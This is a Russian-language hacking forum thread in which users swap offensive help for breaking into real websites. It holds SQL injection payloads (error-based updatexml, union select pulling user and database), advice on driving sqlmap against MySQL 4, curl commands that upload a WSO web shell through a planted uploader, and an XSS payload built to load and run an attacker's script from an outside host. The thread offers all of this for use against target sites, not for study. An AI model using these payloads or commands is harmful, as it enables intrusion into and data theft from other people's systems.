Как это сделать? В сообщение об ошибке SQL данной информации нет. Code: Table 'db_name.table_name' doesn't exist SQL=INSERT INTO table_name ( id, info ) VALUES ( 1, 'data' and updatexml(1,concat(0x3a,version(),2) or '')
Так user() не будет выполнен, т.к. mysql сервер сначала проверяет существование таблицы, в которую происходит вставка. Code: insert into non_existing_table(id, info) values(1,(select user())) // #1146 - Table 'data_base.non_existing_table' doesn't exist Может быть я не корректно задал вопрос. Уточню, что скорее всего таблица просто удалена, а не находится на другом сервере, но при этом есть уязвимый скрипт, который пытается обратиться к ней.
Подскажите, в данном случае: Code: /about/news/1'/ Возможно ли раскрутить SQL и добиться вывода инфы? Любым способом, error-based, blind, time-based и так далее. Все векторы перепробовал, никак не получается.
А если version() заменить на user() или database(), то какой результат получим? Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии. Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ? Code: /about/news/1123123')union(select(1),2,3,4,5,6,user(),8,database(),10)#/ :User: [email protected] Database: u74960
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю Mysql = 4.1 пробовал добавлять --technique=B , --technique=T
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет. Вывод - не заставишь. Для ветки 4.* такой технологии нет.
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь. ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться
поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать
На сайт загружен php файл с таким содержимым: PHP: <? if ($_FILES['F1l3']) { move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; } else { echo 'You are forbidden!'; } ?> Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.
Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как: Возможность доступа к ФС Наличие таблицы с отладочной информацией Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc) etc PHP: curl -F "F1l3=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php
Добрый день. Имеется сайт с XSS: http://site.com/?name=XSS_TEXT Html код этой страницы такой: Code: <html> <head> <script src="http://site.com/javascript-file.js?param=[COLOR=DarkOrange]XSS_TEXT[/COLOR]"></script> </head> <body> ... </body> <html> В свою очередь http://site.com/javascript-file.js?param=XSS_TEXT отдает вот что: Code: var sss = { "param1" : 1, "param2" : { "param3" : 3, "param4" : "[COLOR=DarkOrange]XSS_TEXT[/COLOR]" } }; Проблема в том что режется ' , ( , ) , scripts . Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что: http://site.com/javascript-file.js?param="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" Code: var sss = { "param1" : 1, "param2" : { "param3" : 3, "param4" : ""}}; [COLOR=DarkOrange]document.head.childNodes[1].src="http://mysite.com/global.js";[/COLOR] var b={"1":{"1":"" } }; Fосле выполнения моего кода http://site.com/?name="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким: Code: <html> <head> <script src="http://mysite.com/global.js"></script> </head> <body> ... </body> <html> src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js) Спасибо
TIGERSSS, Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера. WendM, Строки можно представить в HEX-виде. Для выполнения можно использовать document.location и протокол javascript (не уверен, что схема заработает на всех современных браузерах).
Code: curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта. если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же